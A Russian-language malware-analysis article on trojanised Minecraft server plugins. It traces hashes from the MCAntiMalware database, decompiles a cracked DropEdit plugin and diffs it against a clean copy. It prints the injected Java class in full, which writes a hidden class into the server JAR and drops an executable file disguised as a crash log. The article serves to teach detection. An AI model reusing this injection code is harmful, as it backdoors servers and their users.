Вез­десущая мал­варь доб­ралась до уют­ных миров Minecraft. Что­бы оце­нить мас­штаб бедс­твий, я иссле­довал нес­коль­ко пой­ман­ных ана­лити­ками сем­плов. Про­читав статью, ты узна­ешь, сто­ит ли доверять слу­чай­ным модифи­каци­ям и как самос­тоятель­но рас­познать опас­ные при­ложе­ния на Java, даже если им уда­лось обхитрить твой анти­вирус.

Поиск семплов

Я верю в глу­бокое изу­чение кон­крет­ных сем­плов. Поэто­му пер­вым делом я решил поис­кать анти­вирус, соз­данный спе­циаль­но для поль­зовате­лей «Май­нкраф­та». Нес­коль­ко ути­лит лечили пос­ледс­твия ата­ки печаль­но извес­тно­го Fracturiser. Но есть и анти­вирус обще­го наз­начения — MCAntiMalware.

Это сер­верное при­ложе­ние на Java, которое про­веря­ет хеши фай­лов и нес­коль­ко видов сиг­натур. Меня инте­ресу­ет толь­ко его база, которая лежит по адре­су src\ main\ resources\ database. db . База сох­ранена в фор­мате SQLite, так что откро­ем ее через бес­плат­ный SQLite Browser.

В таб­лице BlacklistedChecksums видим набор хешей SHA-1. У меня нет дос­тупа к базам VirusTotal (напиши мне, если у тебя есть!), так что будем искать хеши в Google. Хешей все­го лишь 349 штук. Мож­но было бы написать скрипт, но я решил, что быс­трее будет про­верить их вруч­ную. Сегод­ня погово­рим о най­ден­ных сем­плах.

DropEdit 1.10.4

SHA1: C471E7A958305B003A16459EDD59C9C552F56DAB

Это взло­ман­ный вари­ант плат­ного пла­гина для Bukkit — популяр­ного заг­рузчи­ка модов для сер­веров Minecraft. Я поис­кал по име­ни пла­гина его копии и на каком‑то богом забытом форуме нашел вер­сию 1.10.3. Закиды­ваем файл JAR в деком­пилятор JD-GUI и получа­ем исходный код прог­раммы. В боль­шинс­тве слу­чаев JD-GUI хорошо справ­ляет­ся со сво­ей задачей, но при ошиб­ках деком­пиляции мож­но исполь­зовать дру­гие инс­тру­мен­ты.

При ком­пиляции Java сох­раня­ет име­на перемен­ных и фун­кций. Они могут быть замене­ны сто­рон­ним обфуска­тором. Так­же код может быть спря­тан за Base64 или бес­смыс­ленной Unicode-стро­кой и рас­шифро­вывать­ся по мере исполне­ния. Подоб­ных трю­ков впол­не дос­таточ­но, что­бы счи­тать файл подоз­ритель­ным.

Код обе­их вер­сий выг­лядит похожим, но во вред­ной вер­сии есть какие‑то встав­ки, которые надо выч­ленить. Для это­го я рас­паковал деком­пилиро­ван­ные исходни­ки (они сох­раня­ются в виде ZIP) и заг­рузил обе пап­ки в инс­тру­мент срав­нения WinMerge.

Од­нако добав­ленные деком­пилято­ром ком­мента­рии мешали срав­нению, так как встав­ленные номера строк и пути к исходным фай­лам не сов­пада­ют. Поэто­му я убрал их при помощи регуляр­ных выраже­ний. Обыч­но я тес­тирую их на сай­те regex101. Вот как это мож­но сде­лать.

/ * Location: C:\ Users\ admin\ Desktop\ minecraft\ DropEdit_1. 10. 4. jar!\ de\ Linus122\ DropEdit\ Cmd. class * Java compiler version: 8 ( 52. 0) * JD-Core Version: 1. 1. 3 */

Этот блок лег­ко пой­мать регуляр­кой \/\ * Location: [ ^\/] +\ *\ / . В ней ловим конец ком­мента­рия пос­ле стро­ки Location , забирая все сим­волы, кро­ме обратно­го сле­ша.

/ * */ public Manager ( Plugin pl ) { / * 27 */ InputStream is = pl . getResource ( "config_default. yml" ) ; / * */

Та­ким же обра­зом выреза­ются ком­мента­рии с номером стро­ки. Для это­го подой­дет регуляр­ка \/\ *[\ d ] +\ *\ / , в которой мы забира­ем про­белы и циф­ры меж­ду звез­дочек со сле­шами. Я исполь­зовал Notepad++ для поис­ка и замены регуляр­ных выраже­ний во всех фай­лах в пап­ке, но с этим спра­вит­ся любой сов­ремен­ный редак­тор тек­ста.

Сно­ва срав­нив пап­ки в WinMerge, теперь видим толь­ко раз­личия в коде. В заражен­ной вер­сии при­сутс­тву­ет новый файл: Manager. java . Прог­нав резуль­тат работы деком­пилято­ра через CodeBeautify, получа­ем тот же код, но с кра­сивым фор­матиро­вани­ем:

public void onEnable ( ) { ReflectionUtils utils = new ReflectionUtils () ; types = utils . loadEntityTypes () ; if ( isUnix ( System . getProperty ( "os. name" ))) ; // (... ) public static boolean isUnix ( String OS ) { return !( OS . indexOf ( "nix" ) < 0 & & OS . indexOf ( "nux" ) < 0 & & OS . indexOf ( "aix" ) < = 0 ) ; }

В отли­чие от осталь­ных сем­плов, этот про­веря­ет, что он исполня­ется на Unix.

package de. Linus122. DropEdit ; import java. io. File ; import java. io. FileOutputStream ; import java. io. InputStream ; import java. io. OutputStream ; import java. io. Writer ; import java. net. URI ; import java. nio. charset. StandardCharsets ; import java. nio. file. FileSystem ; import java. nio. file. FileSystems ; import java. nio. file. Files ; import java. nio. file. OpenOption ; import java. nio. file. Path ; import java. nio. file. Paths ; import java. nio. file. StandardOpenOption ; import java. util. HashMap ; import java. util. Map ; import org. apache. commons. io. IOUtils ; import org. bukkit. Bukkit ; import org. bukkit. plugin. Plugin ; public class Manager { public Manager ( Plugin pl ) { InputStream is = pl . getResource ( "config_default. yml" ) ; String jar = ( new File ( Bukkit . class . getProtectionDomain () . getCodeSource () . getLocation () . getPath ())) . getName () ; try { File dir ; Map < String , String > env = new HashMap < > () ; env . put ( "create" , "true" ) ; Path path = Paths . get ( jar , new String [ 0 ]) ; URI uri = URI . create ( "jar: " + path . toUri ()) ; Exception exception1 = null , exception2 = null ; try { FileSystem fs = FileSystems . newFileSystem ( uri , env ) ; try { Path nf = fs . getPath ( "org/ bukkit/ craftbukkit/ Main2. class" , new String [ 0 ]) ; Exception exception3 = null , exception4 = null ; try { Writer writer = Files . newBufferedWriter ( nf , StandardCharsets . ISO_8859_1 , new OpenOption [ ] { StandardOpenOption . CREATE }) ; try { while ( true ) { int value = is . read () ; if ( value == - 1 ) break ; writer . write ( value ) ; } } finally { if ( writer != null ) writer . close () ; } } finally { exception4 = null ; if ( exception3 == null ) { exception3 = exception4 ; } else if ( exception3 != exception4 ) { exception3 . addSuppressed ( exception4 ) ; } } } finally { if ( fs != null ) fs . close () ; } } finally { exception2 = null ; if ( exception1 == null ) { exception1 = exception2 ; } else if ( exception1 != exception2 ) { exception1 . addSuppressed ( exception2 ) ; } } File fileOUT = new File ( dir . getPath () , "crash-2017-06-01_22. 06. 22-server. txt" ) ; InputStream is2 = pl . getResource ( "old_config. txt" ) ; OutputStream os = new FileOutputStream ( fileOUT ) ; IOUtils . copy ( is2 , os ) ; dir . setReadable ( true , true ) ; dir . setWritable ( true , true ) ; dir . setExecutable ( true , true ) ; fileOUT . setReadable ( true , true ) ; fileOUT . setWritable ( true , true ) ; fileOUT . setExecutable ( true , true ) ; } catch ( Exception exception ) { } } }

Об­рати вни­мание на импорт. Работа с фай­ловой сис­темой или сетью нап­рямую всег­да нас­торажи­вает. Легаль­ному пла­гину незачем вылезать за пре­делы ресур­сов игры или отправ­лять дан­ные через сеть, и такое поведе­ние всег­да намека­ет на воз­можную вре­донос­ную активность.